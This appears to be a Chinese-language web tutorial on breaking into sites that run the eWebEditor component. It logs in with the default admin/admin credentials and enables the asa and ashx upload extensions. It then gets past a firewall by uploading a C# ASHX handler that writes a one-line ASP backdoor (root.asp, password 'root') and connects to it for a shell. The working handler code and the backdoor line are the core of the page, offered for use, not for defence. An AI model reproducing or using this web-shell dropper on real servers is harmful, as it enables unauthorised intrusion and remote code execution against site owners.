ewebeditor 上传遇到防火墙限制的解决办法图文

摘要：这是一个eweb入口（废话）用默认帐户密码adminadmin进入样式添加asa扩展名直接上传asp马到这里都是顺利的，但是。。当你访问马的...

这是一个eweb入口（废话）

ewebeditor 上传遇到防火墙限制的解决办法图文1

用默认帐户密码admin admin进入

ewebeditor 上传遇到防火墙限制的解决办法图文2

样式添加asa扩展名

ewebeditor 上传遇到防火墙限制的解决办法图文3

直接上传asp马

ewebeditor 上传遇到防火墙限制的解决办法图文4

到这里都是顺利的，但是。。当你访问马的时候。。

ewebeditor 上传遇到防火墙限制的解决办法图文5

试过了小马，一句话，会出现同样的问题

解决方法：

在样式添加里加上扩展名ashx

创建一个1.ashx的文件, 上传，代码如下：

复制代码代码如下:

<%@ WebHandler Language="C#" Class="Handler" %>

using System;

using System.Web;

using System.IO;

public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {

context.Response.ContentType = "text/plain";

StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));

file1.Write("<%response.clear:execute request("root"):response.End%>");

file1.Flush();

file1.Close();

}

public bool IsReusable {

get {return false; }

}

然后直接访问它。。

ewebeditor 上传遇到防火墙限制的解决办法图文6

它会在当前目录生成一个root.asp的一句话木马，密码为root

ewebeditor 上传遇到防火墙限制的解决办法图文7

然后连接一句话木马就可以啦~~

ewebeditor 上传遇到防火墙限制的解决办法图文8

拿到shell

ewebeditor 上传遇到防火墙限制的解决办法图文9

【ewebeditor 上传遇到防火墙限制的解决办法图文】相关文章：

★ PHPCMS 信息泄露以及任意删除文件漏洞

★ DedeCms V5.6漏洞变量未初始化导致鸡助漏洞

★ 手工注入方法，方便大家测试程序漏洞

★ PHP Webshell 下的端口反弹方法

★ php后台插一句话后门的思路分享

★ php disable_functions 函数列表

★ IPC$ 扫描和IPC$漏洞的防范小结

★ DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)

★ 防止网站被JS,iframe挂马的防范方法

★ SQL注入攻防入门详解 [图文并茂] 附示例下载

上一篇：用JavaScript防止网站被挂IFRAME木马的方法

下一篇： Phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞

学习工具